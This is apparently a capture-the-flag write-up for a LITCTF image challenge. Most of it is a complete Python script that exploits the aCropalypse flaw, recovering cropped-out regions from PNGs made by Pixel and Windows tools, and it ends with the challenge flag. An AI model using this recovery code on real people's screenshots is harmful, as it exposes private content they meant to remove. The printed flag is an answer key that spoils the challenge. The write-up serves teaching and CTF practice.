Misc - a little bit of tomcroppery

117 points | 313 solves

Description

Once you crop an image, the cropped part is gone... right???

Downloads

Solution

I could immediately tell that this is the well-known "aCropalypse" vulnerability. What I didn't expect was that a working script to recover the cropped image to be so difficult to find so, I thought I should document this.

Firstly, one could go to this website to check if an image is vulnerable.

Secondly, use the code below to recover the image.

import zlib
import sys
import io
from PIL import Image
from math import ceil
import numpy as np
import argparse
import struct


def parse_args():
    parser = argparse.ArgumentParser(description="A tool for restoring hidden data in PNG files.")
    subparsers = parser.add_subparsers(dest='command')

    detect_parser = subparsers.add_parser('detect', help="Detect and display the trailing bytes length.")
    detect_parser.add_argument('cropped', help="The input cropped PNG file.")

    delete_parser = subparsers.add_parser('delete', help="Delete the hidden data.")
    delete_parser.add_argument('cropped', help="The input cropped PNG file.")
    delete_parser.add_argument('output', help="The output PNG file without trailing data.")

    restore_parser = subparsers.add_parser('restore', help="Restore the hidden data and create a new PNG image.")
    restore_parser.add_argument('type_exploit', choices=['pixel', 'windows'], help="Type of exploit: 'pixel' or 'windows'.")
    restore_parser.add_argument('cropped', help="The input cropped PNG file.")
    restore_parser.add_argument('reconstructed', help="The output reconstructed PNG file.")

    args = parser.parse_args()
    return args, parser
    
    
    
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IEND_CHUNK = b'IEND'

# Function to read a PNG chunk
def read_chunk(file):
    length_bytes = file.read(4)
    if not length_bytes:
        return None
    length = struct.unpack('!I', length_bytes)[0]
    chunk_type = file.read(4)
    data = file.read(length)
    crc = file.read(4)
    return (chunk_type, data, crc)

# Function to remove data after IEND chunk
def remove_data_after_iend(input_file, output_file):
    with open(input_file, 'rb') as f_in, open(output_file, 'wb') as f_out:
        signature = f_in.read(len(PNG_MAGIC))
        if signature != PNG_MAGIC:
            print("The file is not a valid PNG file.")
            return

        f_out.write(signature)
        while True:
            chunk = read_chunk(f_in)
            if not chunk:
                break

            chunk_type, data, crc = chunk
            f_out.write(struct.pack('!I', len(data)))
            f_out.write(chunk_type)
            f_out.write(data)
            f_out.write(crc)

            if chunk_type == IEND_CHUNK:
                break

# Function to parse PNG chunks
def parse_png_chunk(stream):
    size = int.from_bytes(stream.read(4), "big")
    ctype = stream.read(4)
    body = stream.read(size)
    csum = int.from_bytes(stream.read(4), "big")
    assert(zlib.crc32(ctype + body) == csum)
    return ctype, body

# Function to pack PNG chunks
def pack_png_chunk(stream, name, body):
    stream.write(len(body).to_bytes(4, "big"))
    stream.write(name)
    stream.write(body)
    crc = zlib.crc32(body, zlib.crc32(name))
    stream.write(crc.to_bytes(4, "big"))

# Function to process trailing bytes
def trailing_bytes(input_file):
    with open(input_file, "rb") as f_in:
        magic = f_in.read(len(PNG_MAGIC))
        assert(magic == PNG_MAGIC)
        while True:
            ctype, body = parse_png_chunk(f_in)
            if ctype == b"IEND":
                break

        trailer = f_in.read()
    print(f"Found {len(trailer)} trailing bytes!")

    try:
        next_idat = trailer.index(b"IDAT", 12)
    except ValueError:
        print("No trailing IDATs found :(")
        sys.exit()

    idat = trailer[12:next_idat-8]

    stream = io.BytesIO(trailer[next_idat-4:])
    return idat, stream

# Function to extract IDAT chunk
def extract_idat(idat, stream):
    while True:
        ctype, body = parse_png_chunk(stream)
        if ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        else:
            raise Exception("Unexpected chunk type: " + repr(ctype))

    idat = idat[:-4]

    print(f"Extracted {len(idat)} bytes of idat!")
    return idat

# Function to build a bitstream from IDAT chunk
def build_bitstream(idat):
    print("Building bitstream...")
    bitstream = []
    for byte in idat:
        for bit in range(8):
            bitstream.append((byte >> bit) & 1)

    for _ in range(7):
        bitstream.append(0)
    return bitstream

# Function to reconstruct bit-shifted bytestreams
def bitshifted(bitstream):
    print("Reconstructing bit-shifted bytestreams...")
    byte_offsets = []
    bitstream_np = np.array(bitstream)

    for i in range(8):
        indices = np.arange(i, len(bitstream)-7, 8).reshape(-1, 1)
        bit_indices = np.arange(8)
        shifted_bits = bitstream_np[indices + bit_indices] << bit_indices
        shifted_bytestream = np.sum(shifted_bits, axis=1).astype(np.uint8)
        byte_offsets.append(shifted_bytestream.tobytes())

    assert(byte_offsets[0] == idat)
    assert(byte_offsets[1] != idat)
    return byte_offsets

# Function to find viable parses
def parses(idat, byte_offsets):
    print("Scanning for viable parses...")

    prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000

    for i in range(len(idat)):
        truncated = byte_offsets[i % 8][i // 8:]

        if truncated[0] & 7 != 0b100:
            continue

        d = zlib.decompressobj(wbits=-15)
        try:
            decompressed = d.decompress(prefix + truncated) + d.flush(zlib.Z_FINISH)
            decompressed = decompressed[0x8000:]

            if d.eof and d.unused_data in [b"", b"\x00"]:
                print(f"Found viable parse at bit offset {i}!")
                break
            else:
                print(f"Parsed until the end of a zlib stream, but there was still {len(d.unused_data)} byte of remaining data. Skipping.")
        except zlib.error as e:
            pass
    else:
        print("Failed to find viable parse :(")
        sys.exit()

    print("decompressed length = {}".format(len(decompressed)))
    return decompressed

def parsesv2(idat, byte_offsets):
    print("Scanning for viable parses...")

    prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000

    for i in range(len(idat)):
        truncated = byte_offsets[i % 8][i // 8:]

        if truncated[0] & 7 != 0b100:
            continue

        d = zlib.decompressobj(wbits=-15)
        try:
            decompressed = d.decompress(prefix + truncated) + d.flush(zlib.Z_FINISH)
            decompressed = decompressed[0x8000:]

            unused_data = np.frombuffer(d.unused_data, dtype=np.uint8)

            if d.eof and unused_data.size in [0, 1] and (unused_data == 0).all():
                print(f"Found viable parse at bit offset {i}!")
                break
            else:
                print(f"Parsed until the end of a zlib stream, but there were still {len(d.unused_data)} bytes of remaining data. Skipping.")
        except zlib.error as e:
            pass
    else:
        print("Failed to find viable parse :(")
        exit()

    print("len(decompressed) = {}".format(len(decompressed)))
    return decompressed
    
# Function to create an image from decompressed data
def create_image(height, width, type_exploit, decompressed):
    ihdr = width.to_bytes(4, "big") + height.to_bytes(4, "big") + (8).to_bytes(1, "big")
    ihdr += (2 if type_exploit == "pixel" else 6).to_bytes(1, "big")
    ihdr += (0).to_bytes(3, "big")  # compression method, filter method, interlace method
    channels = 3 if type_exploit == "pixel" else 4
    if type_exploit == "pixel":
        reconstructed_idat = bytearray((b"\x00" + b"\xff\x00\xff" * width) * height)
    elif type_exploit == "windows":
        reconstructed_idat = bytearray((b"\x00" + b"\xff\x00\xff\xff" * width) * height)
    reconstructed_idat[-len(decompressed):] = decompressed
    for i in range(0, len(reconstructed_idat), width * channels + 1):
        if reconstructed_idat[i] == ord("X"):
            reconstructed_idat[i] = 0

    return zlib.compress(reconstructed_idat), ihdr


# Function to generate output PNG file
def generate_png(height, width, type_exploit, decompressed):
    with open(sys.argv[4], "wb") as out:
        PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
        out.write(PNG_MAGIC)
        idat_compressed, ihdr = create_image(height, width, type_exploit, decompressed)
        pack_png_chunk(out, b"IHDR", ihdr)
        pack_png_chunk(out, b"IDAT", idat_compressed)
        pack_png_chunk(out, b"IEND", b"")
    out.close()
    return Image.open(sys.argv[4])

# Function to find final image dimensions
def find_final_width(height, width, type_exploit, decompressed):
    print("Generating output PNG...")
    valid_width = width
    valid_height = 0
    width_increment = 1

    while True:
        
        try:
            generate_png(height, valid_width, type_exploit, decompressed).load()
            break
        except:
            valid_width += width_increment
            if valid_width %10 == 0 : print("Width > {} pixels".format(valid_width))

    for i in range(valid_width, valid_width + 5):
        try:
            valid_height = find_final_height(i, type_exploit, decompressed)
            generate_png(valid_height, i, type_exploit, decompressed).load()
            valid_width = i
        except:
            continue

    return valid_width
    
    
def find_final_height(wid,type_exploit, decompressed) : 
    # (4Width +1) * Height >= len(decompressed)
    if type_exploit == "windows" : return ceil(len(decompressed) / (wid*4 +1))
    if type_exploit == "pixel" : return ceil(len(decompressed) / (wid*3 +1))
# Main function
if __name__ == '__main__':
    args, parser = parse_args()
    
    if len(sys.argv) < 2:
        parser.print_help()
        sys.exit()

    option = sys.argv[1]

    if option == "detect":
        _, _ = trailing_bytes(sys.argv[2])
        print("The image is vulnerable")
        sys.exit()

    elif option == "delete":
        if len(sys.argv) != 4:
            parser.print_help()
            sys.exit()
        else:
            remove_data_after_iend(sys.argv[2], sys.argv[3])
            print("Data after IEND marker has been removed and the new file has been saved as '{}'".format(sys.argv[3]))
            sys.exit()

    elif option == "restore":
        if len(sys.argv) != 5 or sys.argv[2] not in ["pixel", "windows"]:
            parser.print_help()
            sys.exit()
        else:
            type_exploit = sys.argv[2]
            cropped_img = Image.open(sys.argv[3])

            idat, stream = trailing_bytes(sys.argv[3])
            idat = extract_idat(idat, stream)
            bitstream = build_bitstream(idat)
            bitshifted_bytestream = bitshifted(bitstream)
            decompressed = parsesv2(idat, bitshifted_bytestream)

            width, _ = cropped_img.size
            height = ceil(len(decompressed) ** 0.5)

            valid_width = find_final_width(height, width, type_exploit, decompressed)
            valid_height = find_final_height(valid_width, type_exploit, decompressed)
            print("Dimensions found = {}x{}".format(valid_width, valid_height))
            generate_png(valid_height, valid_width, type_exploit, decompressed).show()
            sys.exit()

    else:
        parser.print_help()
        sys.exit()

Image being recovered

Flag: LITCTF{4cr0p41yp5e_15_k1nd_0f_c001_j9g0s}

Last updated